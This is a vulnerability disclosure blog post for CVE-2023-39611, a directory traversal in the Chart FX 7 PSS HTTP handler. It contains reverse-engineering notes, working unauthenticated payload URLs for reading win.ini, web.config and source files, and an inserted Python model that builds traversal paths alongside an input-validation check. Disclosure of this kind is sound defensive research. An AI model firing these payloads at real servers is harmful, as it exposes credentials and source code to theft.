My Chart FX 7 software investigation journey leading to a Directory Traversal vulnerability (CVE-2023-39611)
About the Software
Chart FX 7 is a data visualization library that allows developers to create a variety of charts. It supports various platforms and languages, providing tools for creating interactive and visually compelling charts in web and desktop applications. With a user-friendly interface, Chart FX 7 simplifies the integration of powerful data visualization capabilities into diverse software projects.
In this blog post we will focus on version v7.0.4962.20829.
Vulnerability
Directory Traversal (also known as Path Traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.
Reverse Engineering Process
During my work as a penetration tester and red teamer at Sompo Digital Lab Tel Aviv, I encountered the Chart FX 7 product and decided to download the trial version and play with it.
I downloaded the trial version of Software FX’s Chart FX 7 for .NET from the official Software FX site:
https://www.softwarefx.com/products/chartfx/visual-studio/chartfx-7/features.aspx
While analysing the file structure of the software I noticed the ChartFX.PSS.HttpHandler.dll file in the Bin directory.
The HTTP handler DLL files in the product directory handle the HTTP communication of ASP.NET web applications, so the ChartFX.PSS.HttpHandler.dll file has to be added to the ASP.NET web application for Chart FX 7 to work.
I started investigating the Chart FX 7 software by opening ChartFX.PSS.HttpHandler.dll in the dnSpy decompiler, which decompiles the assembly to C#.
Link to dnSpy tool: https://github.com/dnSpy/dnSpy
I found that the HTTP handler forwards the HTTP request arguments to a PSS service over TCP on port 8082.
I then looked for the PSS service that the HTTP handler communicates with, in order to investigate its files: I found the PSS service process in Task Manager and opened its file location.
The PSS service files are located under the “PSS” directory. I started with the ChartFX.PSS.Service.exe.config file, which contains configuration settings including an optional output folder for the generated files and the same TCP channel I found above.
Next, I opened the ChartFX.PSS.Service.exe file in the dnSpy decompiler. Note that the version used is v7.0.4962.20829.
After following the code flow from the HTTP handler to the PSS service and back, I came to the following conclusions:
The HTTP request to the chartfx70/pss/ChartFX.aspx endpoint takes the following three parameters: id, type and mime.
1. The “id” parameter consists of a digit, followed by a hyphen, followed by digits that form part of the file name: the part of the value after the ‘-’ character is used as the start of the name of the file to be read.
For example, for the “id” value “0-071217250”, “071217250” will be part of the name of the file that the software tries to read.
2. The “type” parameter value is added to the end of the file name that the software will try to read.
For example, in the following “type” value of “png”, the file name that the software will try to read will end with “png”.
3. The “mime” parameter value determines the content type header for the HTTP response. Note that this parameter is not used in the construction of the file name to be read.
For example, in the following “mime” value of “image/png”, the value of the HTTP response Content-Type header will be “image/png”.
To explain the code flow, I will use the following unauthenticated HTTP GET request as an example:
http://localhost:2096/chartfx70/pss/ChartFX.aspx?id=0-071217250&type=png&mime=image%2Fpng
By following the arguments passed to ChartFX.PSS.Service.exe I found that the service uses them to build the full path of the file returned to the client.
Here we can see that the software looks for the hyphen character and splits the “id” argument into two variables:
In our example, the “0-071217250” value will be split into “0” and “071217250”.
Here we can see that the software combines some strings to get the file name to be read:
In function c, the software appends the current user’s name (or “(anonymous)” if unauthenticated) to the “this.a” variable, which holds the value of the A_2 parameter (shown in Figure 1.8).
In our example, “071217250” is combined with the “(anonymous)” value to return the following string: “071217250(anonymous)”.
Then, in function a, the software combines the “A_0” value, which holds the “type” argument, with the “this.c” variable, which holds the string returned by function c.
In our example, “071217250(anonymous)” is joined with the “png” value (separated by an underscore) to return the following string: “071217250(anonymous)_png”.
Next, function b combines the “A_0” string, which is the string returned by function a (shown in Figure 1.9), with the “this.o” variable, which holds one of the following:
- The %TempPath% value from the ChartFX.PSS.Service.exe.config file (shown in image 1.1).
- The “Temp” folder, under the “PSS” directory.
Then, the software reads this file and returns it as an HTTP response:
So for our example, the software will return the following file:
C:\Program Files (x86)\Chart FX 7\PSS\Temp\071217250(anonymous)_png
Additionally, I found in the ChartFX.PSS.HttpHandler.dll file that the “mime” argument is used to set the Content-Type header of the HTTP response:
Proof of Concept
Now that we have all the relevant information, namely the file-name convention and the file location, we can access any file on the filesystem that the PSS service has access to, including files located on other partitions.
Let’s show some examples:
Example 1: File system files located on the same partition (drive letter C) as the PSS service output files folder.
The following request returns the C:\windows\win.ini file with the “image/png” content type (the number of dot-dot-slash sequences needed depends on the %TempPath% value in ChartFX.PSS.Service.exe.config, or, in my case, on the location of the “Temp” folder under the “PSS” directory).
Example 2: Source code file located on another partition (drive letter D).
Payload: http://localhost:2096/chartfx70/pss/ChartFX.aspx?id=0-d:&type=\\..\aa\Default.aspx&mime=text/html
The C# Path.Combine function discards its first argument when the second argument is rooted, which on Windows includes a second argument that starts with a drive letter; the second argument is then returned as the full path.
In this example, the second argument will be d:(anonymous)\..\aa\Default.aspx, so the service reads the D:\aa\Default.aspx file and returns its source, which the browser renders as HTML (since the content type is “text/html”).
Note that since the HTTP response content type is attacker-controlled and set to “text/html” here, the returned content is rendered by the browser, so attackers may potentially leverage this for attacks such as XSS.
Example 3: Configuration file located on another partition (drive letter D).
In this example, the second argument will be d:(anonymous)\..\web.config, so the service reads the D:\web.config file and the browser downloads it to our machine (since the content type is “application/x-msdownload”).
This vulnerability allows unauthenticated users to traverse the web server’s path in order to access and download files on the hosting server’s filesystem that should not be publicly accessible.
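The file-name construction traced above and the proof-of-concept requests, as an added example that is not part of the original post or of the Chart FX product: it re-implements the documented steps (split “id” at the hyphen, append the user name, append “_” plus “type”, combine with the output folder) in Python using ntpath, so that the Windows path rules, including the Path.Combine drive-letter behaviour from Example 2, reproduce on any OS. The output folder, the “(anonymous)” user name and the endpoint are the ones named in the post; the same-drive win.ini payload, the `poc_url` helper and the `is_safe_request` check are constructed here and are not the vendor’s code or fix.

```python
import ntpath
import re
from urllib.parse import urlencode

# Default output folder named in the post (used when no %TempPath% is configured).
PSS_TEMP = r"C:\Program Files (x86)\Chart FX 7\PSS\Temp"
ANON_USER = "(anonymous)"
HANDLER_PATH = "/chartfx70/pss/ChartFX.aspx"


def build_filename(id_param: str, type_param: str, user: str = ANON_USER) -> str:
    """Model of functions c, a and b from the decompiled service.

    - the 'id' value is split at the first '-' and the remainder becomes the stem
    - function c appends the user name ("(anonymous)" when unauthenticated)
    - function a appends '_' + the 'type' value
    - function b combines the result with the output folder
    ntpath.join follows the same rule as .NET Path.Combine on Windows: when the
    second argument is rooted (starts with '\\' or a drive letter such as 'd:'),
    the first argument is discarded.
    """
    _, _, stem = id_param.partition("-")
    return ntpath.join(PSS_TEMP, f"{stem}{user}_{type_param}")


def resolve(path: str) -> str:
    """Collapse '.' and '..' components, as the Windows file APIs do on open."""
    return ntpath.normpath(path)


def poc_url(base: str, id_param: str, type_param: str, mime: str) -> str:
    """Unauthenticated GET; 'mime' is reflected into the response Content-Type."""
    query = urlencode({"id": id_param, "type": type_param, "mime": mime})
    return base + HANDLER_PATH + "?" + query


def is_safe_request(id_param: str, type_param: str) -> bool:
    """Hardened input check (an illustration added here, not the vendor's fix).

    1. Accept only the shapes a legitimate request needs: 'digits-digits' for id
       and letters/digits for type. This alone rejects '\\', '..' and 'd:'.
    2. Defence in depth: the resolved path must still lie under PSS_TEMP
       (compared case-insensitively, as NTFS is).
    """
    if not re.fullmatch(r"\d+-\d+", id_param):
        return False
    if not re.fullmatch(r"[A-Za-z0-9]+", type_param):
        return False
    full = resolve(build_filename(id_param, type_param)).lower()
    return full.startswith(resolve(PSS_TEMP).lower() + "\\")


# --- constructed sample requests ------------------------------------------------
# The legitimate request from the post: id=0-071217250&type=png
BENIGN = build_filename("0-071217250", "png")
# Example 2 from the post: the drive letter in 'id' makes the combined name rooted,
# so the Temp folder is discarded, and the leading '\..' in 'type' removes the
# '(anonymous)_' suffix component the service appended. The result is a
# drive-relative path, which Windows resolves against the current directory of
# D: (its root unless the process changed it), i.e. D:\aa\Default.aspx.
DRIVE_ESCAPE = build_filename("0-d:", r"\..\aa\Default.aspx")
# Constructed same-drive traversal: one '..' consumes the appended suffix
# component, then one '..' per directory level of PSS_TEMP (four for the
# default folder above); a different %TempPath% needs a different count.
SAME_DRIVE = build_filename("0-x", r"\..\..\..\..\..\windows\win.ini")

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("drive escape", DRIVE_ESCAPE),
                       ("same drive", SAME_DRIVE)):
        print(f"{label:12} {raw}")
        print(f"{'':12} -> {resolve(raw)}")
    print(poc_url("http://localhost:2096", "0-d:", r"\..\aa\Default.aspx", "text/html"))
```

The post’s Example 2 payload writes the leading separator as `\\..`; this model uses a single backslash, which ntpath.normpath treats identically because it drops the empty component. The allow-list in `is_safe_request` is the check that actually closes the hole; the containment test is kept because a later change to the naming scheme (for example a user name that can contain separators) would otherwise reopen it silently.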
CVE ID: CVE-2023-39611
Disclosure Timeline
Reported to the vendor: Feb 2023
Reported to MITRE: 27th Jul 2023
CVE Assigned: 28th Aug 2023
Discovered By
Ariel Breisacher, Sompo Digital Lab Tel Aviv — Cyber Center of Excellence
References
My LinkedIn: https://il.linkedin.com/in/ariel-breisacher-ba3079211
About Sompo Digital Lab Tel Aviv: https://sompo.io/en/about
